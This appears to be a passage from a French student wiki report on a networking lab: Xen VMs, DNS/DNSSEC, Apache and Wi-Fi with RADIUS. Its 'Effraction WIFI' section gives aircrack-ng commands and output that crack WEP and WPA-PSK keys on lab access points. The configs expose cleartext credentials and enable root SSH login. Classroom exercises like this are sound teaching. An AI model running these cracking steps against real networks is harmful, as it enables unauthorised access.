Freeradius a été installé sur la machine de service, malgré différentes tentatives, je n'ai pas réussi à le faire fonctionner&lt;br /&gt;
&lt;br /&gt;
Dans /etc/freeradius/3.0/clients.conf , j'ai rajouté:&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
client wifi-ap-306 {                                                                &lt;br /&gt;
                ipaddr = 172.27.0.3                                                 &lt;br /&gt;
                secret = radius_thomas                                              &lt;br /&gt;
                shortname = wifi-e306                                               &lt;br /&gt;
                nas_type = cisco                                                    &lt;br /&gt;
}                                                                                   &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Dans /etc/freeradius/3.0/users :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;quot;tdelobel&amp;quot; Cleartext-Password := &amp;quot;Seconddegree2&amp;quot;                                    &lt;br /&gt;
        Tunnel-Type = VLAN,                                                         &lt;br /&gt;
        Tunnel-Medium-Type = IEEE-802,                                              &lt;br /&gt;
        Tunnel-Private-Group-Id = 16                                                &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, dans /etc/freeradius/3.0/mods-available/eap  ,  J'ai modifié la ligne suivante  : &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
default_eap_type = peap   &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12569</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12569"/>
		<updated>2026-02-27T16:39:18Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Compte rendu : ===&lt;br /&gt;
&lt;br /&gt;
==== Création du bridge dans capbreton ====&lt;br /&gt;
Avant de créer nos VM, on ajoute notre bridge à capbreton  dans SE42026_cpayet_tdelobel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto pont_pacman&lt;br /&gt;
iface pont_pacman inet manual&lt;br /&gt;
    bridge_ports none&lt;br /&gt;
    up ip link set $IFACE up&lt;br /&gt;
    down ip link set $IFACE down&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On utilise ifup pour le démarrer.&lt;br /&gt;
&lt;br /&gt;
==== Création des VMs ====&lt;br /&gt;
Pour créer la VM de service et mandataire, on utilise les commandes suivantes&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Manjaro sera la machine de service et LinusTorvalds la mandataire&lt;br /&gt;
&lt;br /&gt;
Puis &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4.Manjaro.cfg&lt;br /&gt;
xen create /etc/xen/SE4.LinusTorvalds.cfg&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nos machines sont maintenant listées.&lt;br /&gt;
&lt;br /&gt;
==== Partitionnement ====&lt;br /&gt;
&lt;br /&gt;
===== Sur capbreton =====&lt;br /&gt;
Tout d'abord on se donne 10g d'espace pour notre machine virtuelle :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
lvcreate -n SE4.Manjaro.var -L 10G virtual&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute dans /etc/xen/SE4.Manjaro.cfg : &amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
disk = [&lt;br /&gt;
            [...],&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'&lt;br /&gt;
        ]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Sur la VM =====&lt;br /&gt;
Afin que la configuration soit enregistré, on modifie le /etc/fstab en ajoutant les lignes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis dans le terminal, on utilise les commandes suivantes (à ne surtout pas utiliser sur capbreton !!)&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvda3 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On peut maintenant relancer la machine pour verifier si la config reste.&lt;br /&gt;
&lt;br /&gt;
Enfin on répète le même schéma pour la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== Adresses ipv4 et ipv6 ====&lt;br /&gt;
Tout d'abord dans notre machine des service, on donne une adresse ipv4 local et ipv6, on modifie donc le fichier /etc/network/interfaces :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.10.2/24&lt;br /&gt;
    gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:&amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique et privé:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo                                                                             &lt;br /&gt;
iface lo inet loopback                                                              &lt;br /&gt;
&lt;br /&gt;
auto eth0                                                                           &lt;br /&gt;
iface eth0 inet static                                                              &lt;br /&gt;
        address 192.168.10.1/24                                                     &lt;br /&gt;
&lt;br /&gt;
auto eth1                                                                           &lt;br /&gt;
iface eth1 inet static                                                              &lt;br /&gt;
        address 193.48.57.166/24                                                    &lt;br /&gt;
        gateway 193.48.57.162                                                       &lt;br /&gt;
iface eth1 inet6 auto                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute au fichier resolv.conf le dns de google et on install les outils qui nous servirons pour la suite (iptables-persistant, ssh, bind9, apache 2...)&lt;br /&gt;
&lt;br /&gt;
==== Masquerade et ssh ====&lt;br /&gt;
Nous pouvons maintenant mettre en places les iptables pour s'occuper à la fois du ssh (redirection de port) et de la Masquerade avec les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir sauvegarder avec iptables-save, on décommente dans  &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin pour permettre de se ssh en root sur toutes les VM, on ajoute dans  &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant, il n'est plus obligatoire de passer par capbreton pour se connecter aux VM, nous utiliserons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@193.48.57.166 #pour la machine mandataire&lt;br /&gt;
ssh root@193.48.57.166 -p 2202 # pour la machine de service&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== DNS ====&lt;br /&gt;
&lt;br /&gt;
===== Machine de service =====&lt;br /&gt;
On débute par modifier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; , on y ajoute notre zone principale et celle de notre camarade :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                           &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis on crée notre zone db.archlinux.lol :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
$TTL 400                                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN SOA ns.archlinux.lol. admin.archlinux.lol. (                                   &lt;br /&gt;
           3611     ; Numéro de version                                             &lt;br /&gt;
          21600     ; Rafraîchissement (6h)                                         &lt;br /&gt;
           3600     ; Re-tentative (1h)                                             &lt;br /&gt;
        2592000     ; Expiration (30j)                                              &lt;br /&gt;
          86400     ; Cache négatif (24h)                                           &lt;br /&gt;
);                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN NS ns.archlinux.lol.                                                           &lt;br /&gt;
@ IN NS ns.archlinuxbtw.lol.                                                        &lt;br /&gt;
                                                                                    &lt;br /&gt;
ns IN A 193.48.57.166                                                               &lt;br /&gt;
@ IN A 193.48.57.166                                                                &lt;br /&gt;
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                    &lt;br /&gt;
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                     &lt;br /&gt;
                                                                                    &lt;br /&gt;
www IN CNAME archlinux.lol.                                                         &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Machine mandataire =====&lt;br /&gt;
Dans la machine mandataire, on doit passer les zones de nos machine de service en zone secondaire, ainsi, on aura un fichier tel que celui-ci :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinux.lol&amp;quot;;                                   &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe36:79d9;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, il faut rajouter nos zones au Glue records de Gandi pour que notre DNS soit reconnu partout dans le monde.&lt;br /&gt;
&lt;br /&gt;
On peut d'ailleurs le vérifier sur le site https://dnschecker.org/&lt;br /&gt;
[[Fichier:Dns-check-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== DNSSEC ====&lt;br /&gt;
Afin de sécuriser notre DNS, on modifie notre &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
        key-directory &amp;quot;/etc/bind/keys&amp;quot;;                                             &lt;br /&gt;
        dnssec-policy &amp;quot;dnspol&amp;quot;;                                                     &lt;br /&gt;
        inline-signing yes;&lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {                                                            &lt;br /&gt;
   keys {                                                                           &lt;br /&gt;
       ksk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
       zsk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
   };                                                                               &lt;br /&gt;
   nsec3param;                                                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et on ajoute un répertoire pour les clés (auquel on donnera les permissions d'écriture) :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys &lt;br /&gt;
chown bind:bind /etc/bind/keys &lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir redémaré bind9 et named, on peut voir que les clés sont effectivement bien généré. Pour vérifier si notre DNS est sécurisé, il faudra passer par https://dnsviz.net/&lt;br /&gt;
[[Fichier:DNSSEC-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== serveur Apache ====&lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de service =====&lt;br /&gt;
&lt;br /&gt;
En premier lieu, on va générer notre clé avec :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinux.lol.key -out archlinux.csr&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Une fois la clé généré on récupère la certification la certification sur Gandi&lt;br /&gt;
&lt;br /&gt;
On va ensuite créer notre site dans &amp;lt;code&amp;gt;etc/apache2/sites-available/archlinux.lol.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La page html sera enregistré dans &amp;lt;code&amp;gt;etc/www/archlinux.lol&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On effectue aussi une redirection du port http vers https.&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    DocumentRoot /var/www/archlinux.lol                                             &lt;br /&gt;
                                                                                    &lt;br /&gt;
    &amp;lt;Directory /var/www/archlinux.lol&amp;gt;                                              &lt;br /&gt;
        Options Indexes FollowSymLinks                                              &lt;br /&gt;
        AllowOverride All                                                           &lt;br /&gt;
        Require all granted                                                         &lt;br /&gt;
    &amp;lt;/Directory&amp;gt;                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined                           &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLVerifyClient None                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant accessible en ipv6. Il faut maintenant configurer la machine mandataire pour qu'il le soit aussi en ipv4.  &lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de mandataire =====&lt;br /&gt;
Là aussi, après avoir récupéré les clé et certificat de la machine mandataire, on va crée un fichier &amp;lt;code&amp;gt;etc/apache2/sites-available/archlinux.lol-proxy.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLProxyEngine on                                                               &lt;br /&gt;
    ProxyPass / https://archlinux.lol/                                              &lt;br /&gt;
    ProxyPassReverse / https://archlinux.lol/                                       &lt;br /&gt;
    ProxyPreserveHost on                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/access.log combined                                 &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant disponible partout et en https.&lt;br /&gt;
[[Fichier:Site-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== Effraction WIFI ====&lt;br /&gt;
&lt;br /&gt;
===== Cassage WEP =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Cassage WPA-PKS =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va maintenant essayer de récupéré la clé avec un dictionaire dico.txt&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation wifi ====&lt;br /&gt;
&lt;br /&gt;
===== Config routeur =====&lt;br /&gt;
On va configurer notre interface, son vrrp et le dhcp :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
ip dhcp pool PoolThomas                                                             &lt;br /&gt;
 network 10.60.6.0 255.255.255.0&lt;br /&gt;
 dns-server 193.48.57.166                                                           &lt;br /&gt;
 default-router 10.60.6.254                                                         &lt;br /&gt;
!                                                                                   &lt;br /&gt;
...&lt;br /&gt;
vlan 16                                                                             &lt;br /&gt;
 name E6-Thomas                                                                     &lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Vlan16                                                                    &lt;br /&gt;
 ip address 10.60.6.2 255.255.255.0                                                 &lt;br /&gt;
 ipv6 address 2001:660:4401:60A6::2/64                                              &lt;br /&gt;
 vrrp 16 address-family ipv4                                                        &lt;br /&gt;
  priority 110                                                                      &lt;br /&gt;
  address 10.60.6.1 primary                                                         &lt;br /&gt;
  exit-vrrp                                                                         &lt;br /&gt;
!&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Configuration bornes wifi : =====&lt;br /&gt;
Sur les bornes wifi, On applique la configuration donné par le sujet :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
conf t&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
aaa authentication login eap_student5 group radius_student5&lt;br /&gt;
radius-server host 192.168.10.2 auth-port 1812 acct-port 1813 key secret_student6        &lt;br /&gt;
aaa group server radius radius_student5                      &lt;br /&gt;
server 192.168.10.2 auth-port 1812 acct-port 1813        &lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_6       &lt;br /&gt;
vlan 16         &lt;br /&gt;
authentication open eap eap_student6 &lt;br /&gt;
authentication network-eap eap_student6&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 16 mode ciphers aes-ccm                  &lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.16&lt;br /&gt;
encapsulation dot1Q 16&lt;br /&gt;
bridge-group 16&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.16&lt;br /&gt;
encapsulation dot1Q 16&lt;br /&gt;
bridge-group 16&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
ssid VM_SERVICES_6&lt;br /&gt;
exit&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Freeradius =====&lt;br /&gt;
Freeradius a été installé sur la machine de service, malgré différentes tentatives, je n'ai pas réussi à le faire fonctionner&lt;br /&gt;
&lt;br /&gt;
Dans /etc/freeradius/3.0/clients.conf , j'ai rajouté :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
